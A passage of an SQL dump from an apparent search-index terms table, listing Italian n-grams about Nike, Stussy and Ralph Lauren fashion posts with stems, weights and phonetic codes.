delete',0,1,1.7667,'G4125343',1,'en'),(24677,'glorioso','glorioso',0,0,0.5333,'G462',1,'en'),(24678,'glorioso passato','glorioso passato',0,1,1.5333,'G462123',1,'en'),(24679,'glorioso passato acg','glorioso passato acg',0,1,1.6667,'G4621232',1,'en'),(24680,'gna','gna',0,0,0.2,'G500',3,'en'),(24681,'gna ha','gna ha',0,1,1.2,'G500',1,'en'),(24682,'gna ha prodotto','gna ha prodotto',0,1,1.5,'G5163',1,'en'),(24683,'gq','gq',0,0,0.1333,'G000',1,'en'),(24684,'gq c\'è','gq c',0,1,1.2,'G000',1,'en'),(24685,'gq c\'è un\'intervista','gq c un',0,1,1.6667,'G536123',1,'en'),(24686,'ha','ha',0,0,0.1333,'H000',3,'en'),(24687,'ha prodotto','ha prodotto',0,1,1.3667,'H163',1,'en'),(24688,'ha prodotto 3','ha prodotto 3',0,1,1.4333,'H163',1,'en'),(24689,'hill','hill',0,0,0.2667,'H400',1,'en'),(24690,'hill system','hill system',0,1,1.3667,'H4235',1,'en'),(24691,'hill system di','hill system di',0,1,1.4667,'H42353',1,'en'),(24692,'hill system è','hill system è',0,1,1.4333,'H4235',1,'en'),(24693,'i materiali','i materiali',0,1,1.3667,'I5364',1,'en'),(24694,'i materiali scelti','i materiali scelti',0,1,1.6,'I5364243',1,'en'),(24695,'i migliori','i migliori',0,1,1.3333,'I5246',1,'en'),(24696,'i migliori in','i migliori in',0,1,1.4333,'I52465',1,'en'),(24697,'ieri','ieri',0,0,0.2667,'I600',1,'en'),(24698,'ieri e','ieri e',0,1,1.2,'I600',1,'en'),(24699,'il','il',0,0,0.1333,'I400',5,'en'),(24700,'il risultato','il risultato',0,1,1.4,'I46243',1,'en'),(24701,'il risultato non','il risultato non',0,1,1.5333,'I462435',1,'en'),(24702,'il una','il una',0,1,1.2,'I450',1,'en'),(24703,'il una collezione','il una collezione',0,1,1.5667,'I452425',1,'en'),(24704,'in due','in due',0,1,1.2,'I530',1,'en'),(24705,'in due contrasting','in due contrasting',0,1,1.6,'I5325362352',1,'en'),(24706,'in possesso','in possesso',0,1,1.3667,'I512',1,'en'),(24707,'in possesso di','in possesso di',0,1,1.4667,'I5123',1,'en'),(24708,'in prosecute','in prosecute',0,1,1.4,'I51623',1,'en'),(24709,'in prosecute adatte','in prosecute adatte',0,1,1.6333,'I51623',1,'en'),(24710,'incondizionatamente','incondizionatament',0,0,1,'I525325353',1,'en'),(24711,'incondizionatamente cominciamo','incondizionatament cominciamo',0,1,2,'I5253253532525',1,'en'),(24712,'incondizionatamente cominciamo con','incondizionatament cominciamo con',0,1,2,'I525325353252525',1,'en'),(24713,'inspired del','inspir del',0,1,1.4,'I521634',1,'en'),(24714,'inspired del di','inspir del di',0,1,1.5,'I5216343',1,'en'),(24715,'interessanti','interessanti',0,0,0.8,'I536253',1,'en'),(24716,'interessanti di','interessanti di',0,1,1.5,'I536253',1,'en'),(24717,'interessanti di altri','interessanti di altri',0,1,1.7,'I536253436',1,'en'),(24718,'italia','italia',0,0,0.4,'I340',6,'en'),(24719,'italia più','italia più',0,1,1.3333,'I341',1,'en'),(24720,'italia più interessanti','italia più interessanti',0,1,1.7667,'I341536253',1,'en'),(24721,'l\'occhio','l',0,0,0.5333,'L200',1,'en'),(24722,'l\'occhio al','l al',0,1,1.3667,'L240',1,'en'),(24723,'l\'occhio al glorioso','l al glorioso',0,1,1.6667,'L242462',1,'en'),(24724,'la','la',0,0,0.1333,'L000',5,'en'),(24725,'la collaborazione','la collaborazione',0,1,1.5667,'L241625',1,'en'),(24726,'la collaborazione minus','la collaborazione minus',0,1,1.7667,'L2416252',1,'en'),(24727,'la nike','la nike',0,1,1.2333,'L520',1,'en'),(24728,'la nike air','la nike air',0,1,1.3667,'L526',1,'en'),(24729,'la nike frutto','la nike frutto',0,1,1.4667,'L52163',1,'en'),(24730,'la nuova','la nuova',0,1,1.2667,'L510',1,'en'),(24731,'la nuova linea','la nuova linea',0,1,1.4667,'L5145',1,'en'),(24732,'la realizzazione','la realizzazione',0,1,1.5333,'L6425',1,'en'),(24733,'la realizzazione della','la realizzazione della',0,1,1.7333,'L642534',1,'en'),(24734,'la safari','la safari',0,1,1.3,'L216',1,'en'),(24735,'la safari le','la safari le',0,1,1.4,'L2164',1,'en'),(24736,'lanciare','lanciar',0,0,0.5333,'L526',1,'en'),(24737,'lanciare una','lanciar una',0,1,1.4,'L5265',1,'en'),(24738,'lanciare una nuova','lanciar una nuova',0,1,1.6,'L52651',1,'en'),(24739,'lauren outlet i','lauren outlet i',0,1,1.5,'L65343',1,'en'),(24740,'lauren polo','lauren polo',0,1,1.3667,'L6514',6,'en'),(24741,'lauren polo italia','lauren polo italia',0,1,1.6,'L651434',5,'en'),(24742,'le','le',0,0,0.1333,'L000',5,'en'),(24743,'le nike','le nike',0,1,1.2333,'L520',1,'en'),(24744,'le nike incondizionatamente','le nike incondizionatamente',0,1,1.9,'L52525325353',1,'en'),(24745,'le nuove','le nuove',0,1,1.2667,'L510',1,'en'),(24746,'le nuove footwear','le nuove footwear',0,1,1.5667,'L5136',1,'en'),(24747,'leggeri','leggeri',0,0,0.4667,'L260',1,'en'),(24748,'leggeri e','leggeri e',0,1,1.3,'L260',1,'en'),(24749,'leggeri e performanti','leggeri e performanti',0,1,1.7,'L26161653',1,'en'),(24750,'linea','linea',0,0,0.3333,'L500',2,'en'),(24751,'linea outdoor','linea outdoor',0,1,1.4333,'L536',1,'en'),(24752,'linea outdoor encouraged','linea outdoor encouraged',0,1,1.8,'L53652623',1,'en'),(24753,'linea outdoor inspired','linea outdoor inspired',0,1,1.7333,'L53652163',1,'en'),(24754,'lineaoff','lineaoff',0,0,0.5333,'L510',1,'en'),(24755,'lineaoff hill','lineaoff hill',0,1,1.4333,'L514',1,'en'),(24756,'lineaoff hill system','lineaoff hill system',0,1,1.6667,'L514235',1,'en'),(24757,'log','log',0,0,0.2,'L200',1,'en'),(24758,'log sulle','log sulle',0,1,1.3,'L240',1,'en'),(24759,'log sulle attrezzature','log sulle attrezzature',0,1,1.7333,'L2436236',1,'en'),(24760,'look e','look e',0,1,1.2,'L200',1,'en'),(24761,'look e tecnologie','look e tecnologie',0,1,1.5667,'L232542',1,'en'),(24762,'materiali','materiali',0,0,0.6,'M364',1,'en'),(24763,'materiali scelti','materiali scelti',0,1,1.5333,'M364243',1,'en'),(24764,'materiali scelti concerning','materiali scelti concerning',0,1,1.9,'M364243252652',1,'en'),(24765,'migliori','migliori',0,0,0.5333,'M246',1,'en'),(24766,'migliori in','migliori in',0,1,1.3667,'M2465',1,'en'),(24767,'migliori in possesso','migliori in possesso',0,1,1.6667,'M246512',1,'en'),(24768,'minus','minu',0,0,0.3333,'M200',3,'en'),(24769,'minus stussy','minu stussy',0,1,1.4,'M232',1,'en'),(24770,'minus stussy è','minu stussy è',0,1,1.4667,'M232',1,'en'),(24771,'miscela','miscela',0,0,0.4667,'M240',1,'en'),(24772,'miscela di','miscela di',0,1,1.3333,'M243',1,'en'),(24773,'miscela di look','miscela di look',0,1,1.5,'M24342',1,'en'),(24774,'modelli','modelli',0,0,0.4667,'M340',1,'en'),(24775,'modelli di','modelli di',0,1,1.3333,'M343',1,'en'),(24776,'modelli di calzature','modelli di calzature',0,1,1.6667,'M34324236',1,'en'),(24777,'modelli targati','modelli targati',0,1,1.5,'M343623',1,'en'),(24778,'modelli targati nike','modelli targati nike',0,1,1.6667,'M34362352',1,'en'),(24779,'mountain','mountain',0,0,0.5333,'M350',1,'en'),(24780,'mountain hill','mountain hill',0,1,1.4333,'M354',1,'en'),(24781,'mountain hill system','mountain hill system',0,1,1.6667,'M354235',1,'en'),(24782,'mountain system','mountain system',0,1,1.5,'M35235',1,'en'),(24783,'mountain system \'s','mountain system s',0,1,1.6,'M352352',1,'en'),(24784,'nations','nation',0,0,0.4667,'N352',3,'en'),(24785,'nations anno','nation anno',0,1,1.4,'N3525',1,'en'),(24786,'nations anno dall\'ultima','nation anno dall',0,1,1.8,'N35253435',1,'en'),(24787,'nikat','nikat',0,0,0.3333,'N230',1,'en'),(24788,'nikat thelizabeth','nikat thelizabeth',0,1,1.5667,'N234213',1,'en'),(24789,'nikat thelizabeth cuando','nikat thelizabeth cuando',0,1,1.8,'N234213253',1,'en'),(24790,'nike','nike',0,0,0.2667,'N200',1,'en'),(24791,'nike \'s','nike s',0,1,1.2333,'N200',1,'en'),(24792,'nike \'s capsule','nike s capsule',0,1,1.5,'N2124',1,'en'),(24793,'nike acg','nike acg',0,1,1.2667,'N200',1,'en'),(24794,'nike acg withinside','nike acg withinside',0,1,1.6333,'N23523',1,'en'),(24795,'nike air','nike air',0,1,1.2667,'N260',1,'en'),(24796,'nike air foamposite','nike air foamposite',0,1,1.6333,'N2615123',1,'en'),(24797,'nike alcuni','nike alcuni',0,1,1.3667,'N2425',1,'en'),(24798,'nike alcuni ralph','nike alcuni ralph',0,1,1.5667,'N2425641',1,'en'),(24799,'nike e','nike e',0,1,1.2,'N200',1,'en'),(24800,'nike e stussy','nike e stussy',0,1,1.4333,'N232',1,'en'),(24801,'nike è una','nike è una',0,1,1.3333,'N250',1,'en'),(24802,'nike frutto','nike frutto',0,1,1.3667,'N2163',1,'en'),(24803,'nike frutto della','nike frutto della',0,1,1.5667,'N21634',1,'en'),(24804,'nike gna','nike gna',0,1,1.2667,'N250',1,'en'),(24805,'nike gna ha','nike gna ha',0,1,1.3667,'N250',1,'en'),(24806,'nike incondizionatamente','nike incondizionatamente',0,1,1.8,'N2525325353',1,'en'),(24807,'nike incondizionatamente cominciamo','nike incondizionatamente cominciamo',0,1,2,'N25253253532525',1,'en'),(24808,'nike off','nike off',0,1,1.2667,'N210',1,'en'),(24809,'nike off mountain','nike off mountain',0,1,1.5667,'N21535',1,'en'),(24810,'nike sb','nike sb',0,1,1.2333,'N210',1,'en'),(24811,'nike sb robert','nike sb robert',0,1,1.4667,'N216163',1,'en'),(24812,'nike size','nike size',0,1,1.3,'N200',1,'en'),(24813,'nike size saranno','nike size saranno',0,1,1.5667,'N265',1,'en'),(24814,'nike tornano','nike tornano',0,1,1.4,'N2365',1,'en'),(24815,'nike tornano a','nike tornano a',0,1,1.4667,'N2365',1,'en'),(24816,'non','non',0,0,0.2,'N000',9,'en'),(24817,'non è','non è',0,1,1.1667,'N000',2,'en'),(24818,'non è il','non è il',0,1,1.2667,'N400',1,'en'),(24819,'nuova','nuova',0,0,0.3333,'N100',2,'en'),(24820,'nuova collezione','nuova collezione',0,1,1.5333,'N12425',1,'en'),(24821,'nuova collezione adatta','nuova collezione adatta',0,1,1.7667,'N124253',1,'en'),(24822,'nuova linea','nuova linea',0,1,1.3667,'N145',1,'en'),(24823,'nuova linea outdoor','nuova linea outdoor',0,1,1.6333,'N14536',1,'en'),(24824,'nuova lineaoff','nuova lineaoff',0,1,1.4667,'N1451',1,'en'),(24825,'nuova lineaoff hill','nuova lineaoff hill',0,1,1.6333,'N14514',1,'en'),(24826,'nuove','nuov',0,0,0.3333,'N100',2,'en'),(24827,'nuove footwear','nuov footwear',0,1,1.4667,'N136',1,'en'),(24828,'nuove footwear nike','nuov footwear nike',0,1,1.6333,'N13652',1,'en'),(24829,'nuovi','nuovi',0,0,0.3333,'N100',1,'en'),(24830,'nuovi modelli','nuovi modelli',0,1,1.4333,'N1534',1,'en'),(24831,'nuovi modelli targati','nuovi modelli targati',0,1,1.7,'N15343623',1,'en'),(24832,'nuoviscuandome','nuoviscuandom',0,0,0.9333,'N12535',1,'en'),(24833,'nuoviscuandome roshe','nuoviscuandom roshe',0,1,1.6667,'N1253562',1,'en'),(24834,'nuoviscuandome roshe rundella','nuoviscuandom roshe rundella',0,1,1.9667,'N12535626534',1,'en'),(24835,'off bunch','off bunch',0,1,1.3,'O152',1,'en'),(24836,'off bunch system','off bunch system',0,1,1.5333,'O15235',1,'en'),(24837,'off mountain','off mountain',0,1,1.4,'O1535',1,'en'),(24838,'off mountain hill','off mountain hill',0,1,1.5667,'O15354',1,'en'),(24839,'off mountain system','off mountain system',0,1,1.6333,'O1535235',1,'en'),(24840,'oggi','oggi',0,0,0.2667,'O200',2,'en'),(24841,'oggi che','oggi che',0,1,1.2667,'O200',1,'en'),(24842,'oggi che strizza','oggi che strizza',0,1,1.5333,'O2362',1,'en'),(24843,'omaggio','omaggio',0,0,0.4667,'O520',1,'en'),(24844,'omaggio alla','omaggio alla',0,1,1.4,'O524',1,'en'),(24845,'omaggio alla divicuandoone','omaggio alla divicuandoone',0,1,1.8667,'O524312535',1,'en'),(24846,'ora','ora',0,0,0.2,'O600',2,'en'),(24847,'ora sono','ora sono',0,1,1.2667,'O625',1,'en'),(24848,'ora sono pronte','ora sono pronte',0,1,1.5,'O6251653',1,'en'),(24849,'ottobre','ottobr',0,0,0.4667,'O316',1,'en'),(24850,'ottobre 2012','ottobr 2012',0,1,1.4,'O316',1,'en'),(24851,'ottobre 2012 sportydoo','ottobr 2012 sportydoo',0,1,1.7333,'O3162163',1,'en'),(24852,'outdoor','outdoor',0,0,0.4667,'O360',2,'en'),(24853,'outdoor encouraged','outdoor encouraged',0,1,1.6,'O3652623',1,'en'),(24854,'outdoor encouraged di','outdoor encouraged di',0,1,1.7,'O3652623',1,'en'),(24855,'outdoor inspired','outdoor inspired',0,1,1.5333,'O3652163',1,'en'),(24856,'outdoor inspired del','outdoor inspired del',0,1,1.6667,'O36521634',1,'en'),(24857,'outlet i','outlet i',0,1,1.2667,'O343',1,'en'),(24858,'outlet i migliori','outlet i migliori',0,1,1.5667,'O3435246',1,'en'),(24859,'passato','passato',0,0,0.4667,'P230',2,'en'),(24860,'passato acg','passato acg',0,1,1.3667,'P232',1,'en'),(24861,'passato acg del','passato acg del',0,1,1.5,'P23234',1,'en'),(24862,'performanti','performanti',0,0,0.7333,'P61653',1,'en'),(24863,'performanti off','performanti off',0,1,1.5,'P616531',1,'en'),(24864,'performanti off bunch','performanti off bunch',0,1,1.7,'P61653152',1,'en'),(24865,'però','però',0,0,0.2667,'P600',1,'en'),(24866,'però il','però il',0,1,1.2333,'P640',1,'en'),(24867,'però il risultato','però il risultato',0,1,1.5667,'P646243',1,'en'),(24868,'più','più',0,0,0.2,'P000',2,'en'),(24869,'più interessanti','più interessanti',0,1,1.5333,'P536253',1,'en'),(24870,'più interessanti di','più interessanti di',0,1,1.6333,'P536253',1,'en'),(24871,'polo italia','polo italia',0,1,1.3667,'P434',5,'en'),(24872,'polo italia più','polo italia più',0,1,1.5,'P4341',1,'en'),(24873,'possesso','possesso',0,0,0.5333,'P200',1,'en'),(24874,'possesso di','possesso di',0,1,1.3667,'P230',1,'en'),(24875,'possesso di nike','possesso di nike',0,1,1.5333,'P2352',1,'en'),(24876,'presentata','presentata',0,0,0.6667,'P6253',1,'en'),(24877,'presentata in','presentata in',0,1,1.4333,'P62535',1,'en'),(24878,'presentata in due','presentata in due',0,1,1.5667,'P625353',1,'en'),(24879,'presentiamo','presentiamo',0,0,0.7333,'P62535',1,'en'),(24880,'presentiamo 3','presentiamo 3',0,1,1.4333,'P62535',1,'en'),(24881,'presentiamo 3 nuovi','presentiamo 3 nuovi',0,1,1.6333,'P625351',1,'en'),(24882,'pro','pro',0,0,0.2,'P600',1,'en'),(24883,'pro \'forest','pro forest',0,1,1.3667,'P61623',1,'en'),(24884,'pro \'forest black','pro forest black',0,1,1.5667,'P61623142',1,'en'),(24885,'prodotto','prodotto',0,0,0.5333,'P630',1,'en'),(24886,'prodotto 3','prodotto 3',0,1,1.3333,'P630',1,'en'),(24887,'prodotto 3 modelli','prodotto 3 modelli',0,1,1.6,'P63534',1,'en'),(24888,'pronte','pront',0,0,0.4,'P653',1,'en'),(24889,'pronte a','pront a',0,1,1.2667,'P653',1,'en'),(24890,'pronte a lanciare','pront a lanciare',0,1,1.5667,'P6534526',1,'en'),(24891,'prosecute','prosecut',0,0,0.6,'P623',1,'en'),(24892,'prosecute adatte','prosecut adatte',0,1,1.5333,'P623',1,'en'),(24893,'prosecute adatte anche','prosecut adatte anche',0,1,1.7333,'P62352',1,'en'),(24894,'put e','put e',0,1,1.1667,'P300',1,'en'),(24895,'put e foamposite','put e foamposite',0,1,1.5333,'P315123',1,'en'),(24896,'questa','questa',0,0,0.4,'Q300',3,'en'),(24897,'questa volta','questa volta',0,1,1.4,'Q3143',1,'en'),(24898,'questa volta però','questa volta però',0,1,1.5667,'Q314316',1,'en'),(24899,'ralph lauren polo','ralph lauren polo',0,1,1.5667,'R4146514',6,'en'),(24900,'realizzazione','realizzazion',0,0,0.8667,'R425',1,'en'),(24901,'realizzazione della','realizzazion della',0,1,1.6333,'R42534',1,'en'),(24902,'realizzazione della collezione','realizzazion della collezione',0,1,2,'R425342425',1,'en'),(24903,'rende','rend',0,0,0.3333,'R530',1,'en'),(24904,'rende omaggio','rend omaggio',0,1,1.4333,'R5352',1,'en'),(24905,'rende omaggio alla','rend omaggio alla',0,1,1.6,'R53524',1,'en'),(24906,'riguardo','riguardo',0,0,0.5333,'R263',1,'en'),(24907,'riguardo ai','riguardo ai',0,1,1.3667,'R263',1,'en'),(24908,'riguardo ai engineers','riguardo ai engineers',0,1,1.7,'R26352562',1,'en'),(24909,'risultato','risultato',0,0,0.6,'R243',2,'en'),(24910,'risultato non','risultato non',0,1,1.4333,'R2435',1,'en'),(24911,'risultato non è','risultato non è',0,1,1.5,'R2435',1,'en'),(24912,'robert rodriguez','robert rodriguez',0,1,1.5333,'R1636362',1,'en'),(24913,'robert rodriguez 7','robert rodriguez 7',0,1,1.6,'R1636362',1,'en'),(24914,'rodriguez','rodriguez',0,0,0.6,'R362',2,'en'),(24915,'rodriguez 7','rodriguez 7',0,1,1.3667,'R362',1,'en'),(24916,'rodriguez 7 sized','rodriguez 7 sized',0,1,1.5667,'R3623',1,'en'),(24917,'roshe','rosh',0,0,0.3333,'R200',1,'en'),(24918,'roshe run','rosh run',0,1,1.3,'R265',1,'en'),(24919,'roshe run \'urban','rosh run urban',0,1,1.5333,'R265615',1,'en'),(24920,'roshe rundella','rosh rundella',0,1,1.4667,'R26534',1,'en'),(24921,'roshe rundella collezione','rosh rundella collezione',0,1,1.8333,'R265342425',1,'en'),(24922,'run \'urban','run urban',0,1,1.3333,'R5615',1,'en'),(24923,'run \'urban safari\'','run urban safari',0,1,1.6,'R5615216',1,'en'),(24924,'rundella','rundella',0,0,0.5333,'R534',1,'en'),(24925,'rundella collezione','rundella collezione',0,1,1.6333,'R5342425',1,'en'),(24926,'rundella collezione rende','rundella collezione rende',0,1,1.8333,'R5342425653',1,'en'),(24927,'safari le','safari le',0,1,1.3,'S164',1,'en'),(24928,'safari le nuove','safari le nuove',0,1,1.5,'S16451',1,'en'),(24929,'safari\'','safari',0,0,0.4667,'S160',1,'en'),(24930,'safari\' put','safari put',0,1,1.3667,'S1613',1,'en'),(24931,'safari\' put e','safari put e',0,1,1.4333,'S1613',1,'en'),(24932,'saranno','saranno',0,0,0.4667,'S650',1,'en'),(24933,'saranno disponibili','saranno disponibili',0,1,1.6333,'S65321514',1,'en'),(24934,'saranno disponibili dal','saranno disponibili dal',0,1,1.7667,'S6532151434',1,'en'),(24935,'sb','sb',0,0,0.1333,'S100',1,'en'),(24936,'sb robert','sb robert',0,1,1.3,'S16163',1,'en'),(24937,'sb robert rodriguez','sb robert rodriguez',0,1,1.6333,'S161636362',1,'en'),(24938,'scelti','scelti',0,0,0.4,'S430',1,'en'),(24939,'scelti concerning','scelti concerning',0,1,1.5667,'S43252652',1,'en'),(24940,'scelti concerning la','scelti concerning la',0,1,1.6667,'S432526524',1,'en'),(24941,'se','se',0,0,0.1333,'S000',2,'en'),(24942,'se volete','se volete',0,1,1.3,'S143',1,'en'),(24943,'se volete approfondire','se volete approfondire',0,1,1.7333,'S143161536',1,'en'),(24944,'seasoned','season',0,0,0.5333,'S530',1,'en'),(24945,'seasoned executive','season executive',0,1,1.6,'S53231',1,'en'),(24946,'seasoned executive \'forest','season executive forest',0,1,1.8667,'S53231623',1,'en'),(24947,'si','si',0,0,0.1333,'S000',3,'en'),(24948,'si avvicina','si avvicina',0,1,1.3667,'S125',1,'en'),(24949,'si avvicina al','si avvicina al',0,1,1.4667,'S1254',1,'en'),(24950,'size saranno','size saranno',0,1,1.4,'S650',1,'en'),(24951,'size saranno disponibili','size saranno disponibili',0,1,1.8,'S65321514',1,'en'),(24952,'sized roshe','size roshe',0,1,1.3667,'S362',1,'en'),(24953,'sized roshe run','size roshe run',0,1,1.5,'S36265',1,'en'),(24954,'sono','sono',0,0,0.2667,'S500',3,'en'),(24955,'sono fatte','sono fatte',0,1,1.3333,'S513',1,'en'),(24956,'sono fatte apposta','sono fatte apposta',0,1,1.6,'S513123',1,'en'),(24957,'sono pronte','sono pronte',0,1,1.3667,'S51653',1,'en'),(24958,'sono pronte a','sono pronte a',0,1,1.4333,'S51653',1,'en'),(24959,'sono ralph','sono ralph',0,1,1.3333,'S5641',1,'en'),(24960,'sono ralph lauren','sono ralph lauren',0,1,1.5667,'S5641465',1,'en'),(24961,'sportive','sportiv',0,0,0.5333,'S1631',1,'en'),(24962,'sportive stussy','sportiv stussy',0,1,1.5,'S1631232',1,'en'),(24963,'sportive stussy x','sportiv stussy x',0,1,1.5667,'S1631232',1,'en'),(24964,'sportydoo','sportydoo',0,0,0.6,'S163',1,'en'),(24965,'sportydoo blogging','sportydoo blogging',0,1,1.6,'S16314252',1,'en'),(24966,'sportydoo blogging sulle','sportydoo blogging sulle',0,1,1.8,'S163142524',1,'en'),(24967,'sportydoo web','sportydoo web',0,1,1.4333,'S1631',1,'en'),(24968,'sportydoo web log','sportydoo web log',0,1,1.5667,'S163142',1,'en'),(24969,'stampa','stampa',0,0,0.4,'S351',1,'en'),(24970,'stampa camouflage','stampa camouflage',0,1,1.5667,'S35125142',1,'en'),(24971,'stampa camouflage clothing','stampa camouflage clothing',0,1,1.8667,'S351251424352',1,'en'),(24972,'strade','strade',0,0,0.4,'S363',1,'en'),(24973,'strade di','strade di',0,1,1.3,'S363',1,'en'),(24974,'strade di città','strade di città',0,1,1.5,'S36323',1,'en'),(24975,'strizza','strizza',0,0,0.4667,'S362',1,'en'),(24976,'strizza l\'occhio','strizza l',0,1,1.5333,'S36242',1,'en'),(24977,'strizza l\'occhio al','strizza l al',0,1,1.6333,'S362424',1,'en'),(24978,'stussy','stussi',0,0,0.4,'S320',1,'en'),(24979,'stussy continuano','stussi continuano',0,1,1.5667,'S32535',1,'en'),(24980,'stussy continuano a','stussi continuano a',0,1,1.6333,'S32535',1,'en'),(24981,'stussy è','stussi è',0,1,1.2667,'S320',1,'en'),(24982,'stussy è composta','stussi è composta',0,1,1.5667,'S325123',1,'en'),(24983,'stussy e nike','stussi e nike',0,1,1.4333,'S3252',1,'en'),(24984,'stussy x','stussi x',0,1,1.2667,'S320',1,'en'),(24985,'stussy x nike','stussi x nike',0,1,1.4333,'S3252',1,'en'),(24986,'su','su',0,0,0.1333,'S000',3,'en'),(24987,'su gq','su gq',0,1,1.1667,'S000',1,'en'),(24988,'su gq c\'è','su gq c',0,1,1.3,'S000',1,'en'),(24989,'sulla','sulla',0,0,0.3333,'S400',2,'en'),(24990,'sulla nuova','sulla nuova',0,1,1.3667,'S451',1,'en'),(24991,'sulla nuova lineaoff','sulla nuova lineaoff',0,1,1.6667,'S451451',1,'en'),(24992,'sulle','sull',0,0,0.3333,'S400',2,'en'),(24993,'sulle attrezzature','sull attrezzature',0,1,1.6,'S436236',1,'en'),(24994,'sulle attrezzature sportive','sull attrezzature sportive',0,1,1.9,'S43623621631',1,'en'),(24995,'system \'s','system s',0,1,1.3,'S352',1,'en'),(24996,'system \'s capsule','system s capsule',0,1,1.5667,'S352124',1,'en'),(24997,'system di','system di',0,1,1.3,'S353',1,'en'),(24998,'system di nike','system di nike',0,1,1.4667,'S35352',1,'en'),(24999,'system è','system è',0,1,1.2667,'S350',1,'en'),(25000,'system è la','system è la',0,1,1.3667,'S354',1,'en'),(25001,'system la','system la',0,1,1.3,'S354',1,'en'),(25002,'system la nuova','system la nuova',0,1,1.5,'S35451',1,'en'),(25003,'targati','targati',0,0,0.4667,'T623',1,'en'),(25004,'targati nike','targati nike',0,1,1.4,'T62352',1,'en'),(25005,'targati nike alcuni','targati nike alcuni',0,1,1.6333,'T62352425',1,'en'),(25006,'tecnologie','tecnologi',0,0,0.6667,'T2542',1,'en'),(25007,'tecnologie che','tecnologi che',0,1,1.4667,'T2542',1,'en'),(25008,'tecnologie che si','tecnologi che si',0,1,1.5667,'T2542',1,'en'),(25009,'thelizabeth','thelizabeth',0,0,0.7333,'T4213',4,'en'),(25010,'thelizabeth cuando','thelizabeth cuando',0,1,1.6,'T4213253',1,'en'),(25011,'thelizabeth cuando tratta','thelizabeth cuando tratta',0,1,1.8333,'T421325363',1,'en'),(25012,'tornano','tornano',0,0,0.4667,'T650',1,'en'),(25013,'tornano a','tornano a',0,1,1.3,'T650',1,'en'),(25014,'tornano a collaborare','tornano a collaborare',0,1,1.7,'T652416',1,'en'),(25015,'tra','tra',0,0,0.2,'T600',2,'en'),(25016,'tra amount','tra amount',0,1,1.3333,'T653',1,'en'),(25017,'tra amount vitamin','tra amount vitamin',0,1,1.6,'T653135',1,'en'),(25018,'tratta','tratta',0,0,0.4,'T630',2,'en'),(25019,'tratta delle','tratta delle',0,1,1.4,'T634',1,'en'),(25020,'tratta delle nuoviscuandome','tratta delle nuoviscuandome',0,1,1.9,'T634512535',1,'en'),(25021,'tre','tre',0,0,0.2,'T600',3,'en'),(25022,'tre se','tre se',0,1,1.2,'T620',1,'en'),(25023,'tre se volete','tre se volete',0,1,1.4333,'T62143',1,'en'),(25024,'tutti','tutti',0,0,0.3333,'T000',2,'en'),(25025,'tutti gli','tutti gli',0,1,1.3,'T240',2,'en'),(25026,'tutti gli appassionati','tutti gli appassionati',0,1,1.7333,'T241253',1,'en'),(25027,'un\'intervista','un',0,0,0.8667,'U536123',1,'en'),(25028,'un\'intervista a','un a',0,1,1.5,'U536123',1,'en'),(25029,'un\'intervista a riguardo','un a riguardo',0,1,1.8,'U5361236263',1,'en'),(25030,'una','una',0,0,0.2,'U500',4,'en'),(25031,'una collezione','una collezione',0,1,1.4667,'U52425',1,'en'),(25032,'una collezione completa','una collezione completa',0,1,1.7667,'U5242525143',1,'en'),(25033,'una miscela','una miscela',0,1,1.3667,'U524',1,'en'),(25034,'una miscela di','una miscela di',0,1,1.4667,'U5243',1,'en'),(25035,'una nuova','una nuova',0,1,1.3,'U510',2,'en'),(25036,'una nuova collezione','una nuova collezione',0,1,1.6667,'U512425',1,'en'),(25037,'una stampa','una stampa',0,1,1.3333,'U52351',1,'en'),(25038,'una stampa camouflage','una stampa camouflage',0,1,1.7,'U5235125142',1,'en'),(25039,'united nations','unit nations',0,1,1.4667,'U535352',3,'en'),(25040,'united nations anno','unit nations anno',0,1,1.6333,'U5353525',1,'en'),(25041,'vi','vi',0,0,0.1333,'V000',2,'en'),(25042,'vi presentiamo','vi presentiamo',0,1,1.4667,'V62535',1,'en'),(25043,'vi presentiamo 3','vi presentiamo 3',0,1,1.5333,'V62535',1,'en'),(25044,'viene','vien',0,0,0.3333,'V500',1,'en'),(25045,'viene presentata','vien presentata',0,1,1.5333,'V516253',1,'en'),(25046,'viene presentata in','vien presentata in',0,1,1.6333,'V5162535',1,'en'),(25047,'vitamin','vitamin',0,0,0.4667,'V350',1,'en'),(25048,'vitamin y','vitamin y',0,1,1.3,'V350',1,'en'),(25049,'vitamin y nikat','vitamin y nikat',0,1,1.5,'V3523',1,'en'),(25050,'volete','volet',0,0,0.4,'V430',1,'en'),(25051,'volete approfondire','volet approfondire',0,1,1.6333,'V43161536',1,'en'),(25052,'volete approfondire su','volet approfondire su',0,1,1.7333,'V431615362',1,'en'),(25053,'volt\'','volt',0,0,0.3333,'V430',1,'en'),(25054,'volt\' foto','volt foto',0,1,1.3333,'V4313',1,'en'),(25055,'volt\' foto vi','volt foto vi',0,1,1.4333,'V43131',1,'en'),(25056,'volta','volta',0,0,0.3333,'V430',1,'en'),(25057,'volta però','volta però',0,1,1.3333,'V4316',1,'en'),(25058,'volta però il','volta però il',0,1,1.4333,'V43164',1,'en'),(25059,'volta stussy','volta stussy',0,1,1.4,'V43232',1,'en'),(25060,'volta stussy e','volta stussy e',0,1,1.4667,'V43232',1,'en'),(25061,'web log','web log',0,1,1.2333,'W142',1,'en'),(25062,'web log sulle','web log sulle',0,1,1.4333,'W1424',1,'en'),(25063,'withinside','withinsid',0,0,0.6667,'W3523',1,'en'),(25064,'withinside blogbabel','withinsid blogbabel',0,1,1.6667,'W352314214',1,'en'),(25065,'withinside blogbabel nike','withinsid blogbabel nike',0,1,1.8333,'W35231421452',1,'en'),(25066,'x nike','x nike',0,1,1.2,'X520',1,'en'),(25067,'x nike \'s','x nike s',0,1,1.3,'X520',1,'en'),(25068,'x nike off','x nike off',0,1,1.3333,'X521',1,'en'),(25069,'y nikat','y nikat',0,1,1.2333,'Y523',1,'en'),(25070,'y nikat thelizabeth','y nikat thelizabeth',0,1,1.6333,'Y5234213',1,'en'),(25071,'.all','.all',0,0,0.2667,'A400',1,'en'),(25072,'.all prizes','.all prizes',0,1,1.3667,'A4162',1,'en'),(25073,'.all prizes will','.all prizes will',0,1,1.5333,'A41624',1,'en'),(25074,'1 entry','1 entry',0,1,1.2333,'E536',1,'en'),(25075,'1 entry per','1 entry per',0,1,1.3667,'E53616',1,'en'),(25076,'1 prize','1 prize',0,1,1.2333,'P620',1,'en'),(25077,'1 prize to','1 prize to',0,1,1.3333,'P623',1,'en'),(25078,'1 victorious','1 victorious',0,1,1.4,'V2362',1,'en'),(25079,'1 victorious american','1 victorious american',0,1,1.7,'V23625625',1,'en'),(25080,'1 